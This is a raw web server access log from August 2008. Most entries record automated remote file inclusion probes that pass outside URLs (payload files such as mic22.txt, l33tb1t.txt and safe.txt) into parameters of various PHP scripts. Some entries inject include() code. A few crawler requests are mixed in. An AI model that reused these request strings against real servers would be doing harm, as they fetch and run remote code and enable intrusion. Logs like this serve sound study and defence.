87.226.77.5 - - [07/Aug/2008:06:17:39 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:17:57 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:17:58 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:17:59 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
69.72.153.58 - - [07/Aug/2008:06:21:21 -0500] "GET /logs/errors.php?error=http://www.ncku.net/components/com_akocomment/templates/rounded_gray/images/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
69.72.153.58 - - [07/Aug/2008:06:21:22 -0500] "GET /errors.php?error=http://www.ncku.net/components/com_akocomment/templates/rounded_gray/images/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
209.172.33.60 - - [07/Aug/2008:06:25:01 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.172.33.60 - - [07/Aug/2008:06:25:01 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.226.77.5 - - [07/Aug/2008:06:25:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:25:24 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
217.23.156.36 - - [07/Aug/2008:06:25:37 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:06:25:38 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.84.19.133 - - [07/Aug/2008:06:27:14 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:06:27:14 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
209.172.33.60 - - [07/Aug/2008:06:27:58 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
209.172.33.60 - - [07/Aug/2008:06:27:58 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
213.133.102.211 - - [07/Aug/2008:06:29:04 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:29:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:29:08 -0500] "GET /logs/access_log.1214438400//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:29:19 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:29:21 -0500] "GET /logs/access_log.1210291200//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:29:26 -0500] "GET /logs/access_log.1210204800//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
74.6.18.231 - - [07/Aug/2008:06:31:32 -0500] "GET /logs/access_log.1156982400 HTTP/1.0" 200 241287 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.222.131.35 - - [07/Aug/2008:06:33:06 -0500] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:06:33:07 -0500] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.172.33.60 - - [07/Aug/2008:06:33:43 -0500] "GET /logs/access_log.1214438400//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:06:33:48 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:06:33:48 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
38.99.44.104 - - [07/Aug/2008:06:34:20 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
83.172.146.49 - - [07/Aug/2008:06:34:47 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:06:34:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:06:34:49 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:06:34:49 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:06:35:03 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:06:35:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
209.172.33.60 - - [07/Aug/2008:06:35:28 -0500] "GET /logs/access_log.1212883200//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
89.255.61.98 - - [07/Aug/2008:06:36:37 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
89.255.61.98 - - [07/Aug/2008:06:36:37 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
209.172.33.60 - - [07/Aug/2008:06:36:55 -0500] "GET /logs/access_log.1213142400//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
74.52.19.154 - - [07/Aug/2008:06:39:39 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 328 "-""Mozilla/3.0 (OS/2; U)"
74.52.19.154 - - [07/Aug/2008:06:39:39 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 333 "-""Mozilla/3.0 (OS/2; U)"
67.18.151.242 - - [07/Aug/2008:06:39:58 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:39:58 -0500] "GET //config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:39:58 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
81.198.180.10 - - [07/Aug/2008:06:40:37 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.198.180.10 - - [07/Aug/2008:06:40:37 -0500] "GET /phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:06:41:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:06:41:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:06:43:03 -0500] "GET /logs/access_log.1214438400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:06:43:03 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:06:43:04 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
67.18.151.242 - - [07/Aug/2008:06:44:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:44:56 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:45:33 -0500] "GET /logs/access_log.1213315200//config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:46:26 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:46:26 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:46:27 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
77.222.131.35 - - [07/Aug/2008:06:46:48 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:06:46:48 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
81.198.180.10 - - [07/Aug/2008:06:46:53 -0500] "GET /phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.226.77.5 - - [07/Aug/2008:06:47:31 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
72.9.233.10 - - [07/Aug/2008:06:47:54 -0500] "GET /logs//modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:06:47:54 -0500] "GET //modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
67.210.98.215 - - [07/Aug/2008:06:47:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
67.210.98.215 - - [07/Aug/2008:06:47:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
87.226.77.5 - - [07/Aug/2008:06:48:04 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:48:05 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:48:06 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
72.29.74.183 - - [07/Aug/2008:06:48:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.29.74.183 - - [07/Aug/2008:06:48:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
212.115.37.130 - - [07/Aug/2008:06:49:09 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
212.115.37.130 - - [07/Aug/2008:06:49:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 307 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
216.133.204.228 - - [07/Aug/2008:06:50:43 -0500] "GET /logs/errors.php?error=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:06:50:43 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:06:50:48 -0500] "GET /errors.php?error=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.97.132.101 - - [07/Aug/2008:06:50:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:06:50:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:06:50:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:06:50:56 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
89.186.1.54 - - [07/Aug/2008:06:55:33 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.800"
89.186.1.54 - - [07/Aug/2008:06:55:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.800"
216.246.78.8 - - [07/Aug/2008:06:55:35 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.militaria.com/2? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:06:55:35 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.militaria.com/2? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.226.77.5 - - [07/Aug/2008:06:55:59 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:56:00 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:56:05 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
213.133.102.211 - - [07/Aug/2008:06:56:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:56:15 -0500] "GET /logs/access_log.1216252800//include/admin.lib.inc.php?site_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:06:56:16 -0500] "GET //include/admin.lib.inc.php?site_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.806"
216.206.238.35 - - [07/Aug/2008:06:56:18 -0500] "GET /phphtml.php?htmlclass_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
87.226.77.5 - - [07/Aug/2008:06:56:28 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.186.1.54 - - [07/Aug/2008:06:58:41 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
89.186.1.54 - - [07/Aug/2008:06:58:41 -0500] "GET /phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
89.186.1.54 - - [07/Aug/2008:06:58:41 -0500] "GET /logs/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
87.226.77.5 - - [07/Aug/2008:06:59:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:06:59:14 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.186.1.54 - - [07/Aug/2008:07:00:23 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
89.186.1.54 - - [07/Aug/2008:07:00:23 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
216.133.204.228 - - [07/Aug/2008:07:00:40 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:00:44 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:00:44 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:03:57 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:03:57 -0500] "GET /phphtml.php?htmlclass_path=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:04:00 -0500] "GET /logs/phphtml.php?htmlclass_path=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:07:06:16 -0500] "GET /logs/phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:07:06:16 -0500] "GET /phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.6.18.231 - - [07/Aug/2008:07:07:06 -0500] "GET /logs/access_log.1156032000 HTTP/1.0" 200 189004 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.133.204.228 - - [07/Aug/2008:07:07:12 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:07:12 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
65.55.208.135 - - [07/Aug/2008:07:07:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [07/Aug/2008:07:07:32 -0500] "GET /logs/access_log.1216166400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Aug/2008:07:07:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Aug/2008:07:07:46 -0500] "GET /?M=D HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.226.77.5 - - [07/Aug/2008:07:09:52 -0500] "GET /logs//?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:07:09:52 -0500] "GET //?path%5Bdocroot%5D=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
67.210.98.215 - - [07/Aug/2008:07:13:03 -0500] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
67.210.98.215 - - [07/Aug/2008:07:13:03 -0500] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
87.101.4.49 - - [07/Aug/2008:07:13:05 -0500] "GET /logs/access_log.1213142400/phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:07:13:06 -0500] "GET /phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:07:13:06 -0500] "GET /logs/phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
203.56.255.14 - - [07/Aug/2008:07:13:30 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
203.56.255.14 - - [07/Aug/2008:07:13:30 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:07:13:50 -0500] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
212.115.37.130 - - [07/Aug/2008:07:13:50 -0500] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.29.74.183 - - [07/Aug/2008:07:14:02 -0500] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.29.74.183 - - [07/Aug/2008:07:14:02 -0500] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
216.133.204.228 - - [07/Aug/2008:07:14:22 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:14:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
77.222.131.35 - - [07/Aug/2008:07:14:35 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:07:14:35 -0500] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:07:14:35 -0500] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.115.37.130 - - [07/Aug/2008:07:15:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 307 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
